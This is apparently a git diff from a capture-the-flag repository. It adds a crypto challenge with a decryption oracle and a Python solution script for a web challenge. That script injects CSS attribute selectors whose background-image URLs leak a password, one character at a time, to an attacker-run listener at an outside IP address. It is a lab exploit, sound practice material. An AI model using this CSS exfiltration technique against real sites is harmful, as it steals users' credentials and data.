diff --git a/.DS_Store b/.DS_Store index 1b5ff76..098777e 100644 Binary files a/.DS_Store and b/.DS_Store differ diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..bc51b40 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ + +htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/challenge/ diff --git a/catthegrey24/.DS_Store b/catthegrey24/.DS_Store new file mode 100644 index 0000000..90dd1ab Binary files /dev/null and b/catthegrey24/.DS_Store differ diff --git a/catthegrey24/crypto/filter_ciphertext/.gitignore b/catthegrey24/crypto/filter_ciphertext/.gitignore new file mode 100644 index 0000000..21d0b89 --- /dev/null +++ b/catthegrey24/crypto/filter_ciphertext/.gitignore @@ -0,0 +1 @@ +.venv/ diff --git a/catthegrey24/crypto/filter_ciphertext/filter_ciphertext.py b/catthegrey24/crypto/filter_ciphertext/filter_ciphertext.py new file mode 100644 index 0000000..4796eab --- /dev/null +++ b/catthegrey24/crypto/filter_ciphertext/filter_ciphertext.py @@ -0,0 +1,77 @@ +from Crypto.Cipher import AES +import os + +with open("flag.txt", "r") as f: + flag = f.read() + +BLOCK_SIZE = 16 +iv = os.urandom(BLOCK_SIZE) + +xor = lambda x, y: bytes(a^b for a,b in zip(x,y)) + +key = os.urandom(16) + +def encrypt(pt): + cipher = AES.new(key=key, mode=AES.MODE_ECB) + blocks = [pt[i:i+BLOCK_SIZE] for i in range(0, len(pt), BLOCK_SIZE)] + tmp = iv + ret = b"" + + for block in blocks: + res = cipher.encrypt(xor(block, tmp)) + ret += res + tmp = xor(block, res) + + return ret + + +def decrypt(ct): + cipher = AES.new(key=key, mode=AES.MODE_ECB) + blocks = [ct[i:i+BLOCK_SIZE] for i in range(0, len(ct), BLOCK_SIZE)] + + for block in blocks: + if block in secret_enc: + blocks.remove(block) + + tmp = iv + ret = b"" + + for block in blocks: + res = xor(cipher.decrypt(block), tmp) + ret += res + tmp = xor(block, res) + + return ret + +secret = os.urandom(80) +secret_enc = encrypt(secret) + +print(f"Encrypted secret: {secret_enc.hex()}") + +print("Enter messages to decrypt (in hex): ") + +while True: + res = input("> ") + + try: + enc = bytes.fromhex(res) + + if (enc == secret_enc): + print("Nice try.") + continue + + dec = decrypt(enc) + if (dec == secret): + print(f"Wow! Here's the flag: {flag}") + break + + else: + print(dec.hex()) + + except Exception as e: + print(e) + continue + + + + diff --git a/catthegrey24/web/.DS_Store b/catthegrey24/web/.DS_Store new file mode 100644 index 0000000..4cb665c Binary files /dev/null and b/catthegrey24/web/.DS_Store differ diff --git a/catthegrey24/web/beautiful_styles/.gitignore b/catthegrey24/web/beautiful_styles/.gitignore new file mode 100644 index 0000000..691037e --- /dev/null +++ b/catthegrey24/web/beautiful_styles/.gitignore @@ -0,0 +1 @@ +.venv/* diff --git a/catthegrey24/web/beautiful_styles/enumeration.py b/catthegrey24/web/beautiful_styles/enumeration.py new file mode 100644 index 0000000..eedbdcd --- /dev/null +++ b/catthegrey24/web/beautiful_styles/enumeration.py @@ -0,0 +1,51 @@ +import string +import requests +import re +from http.server import BaseHTTPRequestHandler, HTTPServer +from urllib.parse import unquote + + +chars = string.ascii_uppercase + string.digits + "f" +url = "http://challs2.nusgreyhats.org:33339" +headers = {"Content-Type": "application/x-www-form-urlencoded"} + + +class LeakHandler(BaseHTTPRequestHandler): + def do_GET(self): + print("Got GET request") + leaked_password = unquote(self.path.split("/")[-1]) + print(f"Password: {leaked_password}") + self.send_response(200) + self.end_headers() + self.wfile.write(b"exploiting in progress") + print("Next round") + leak_char(leaked_password) + + +def generate_css_input(leaked_password): + css_input = "" + + for a in chars: + css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url(http://49.12.225.44:8000/{leaked_password + a});}}' + + return css_input + + +def leak_char(leaked_password): + css_input = generate_css_input(leaked_password) + print("Leaking character") + with requests.post( + f"{url}/submit", data={"css_value": css_input}, headers=headers + ) as r: + match = re.search(r"/judge/([a-zA-Z0-9-]+)", r.text) + if match: + id_value = match.group(1) + print("Found ID:", id_value) + r = requests.post(f"http://challs2.nusgreyhats.org:33339/judge/{id_value}") + print(r.text) + else: + print("error") + + +httpd = HTTPServer(("0.0.0.0", 8000), LeakHandler) +httpd.serve_forever() diff --git a/htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/build-docker.sh b/htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/build-docker.sh index e10e147..6f567d7 100755 --- a/htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/build-docker.sh +++ b/htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/build-docker.sh @@ -1,3 +1,3 @@ #!/bin/sh docker build --tag=sound_of_silence . -docker run -it -p 1337:1337 --rm --name=sound_of_silence sound_of_silence +docker run -it -p 1337:1337 --rm --name=sound_of_silence sound_of_silence \ No newline at end of file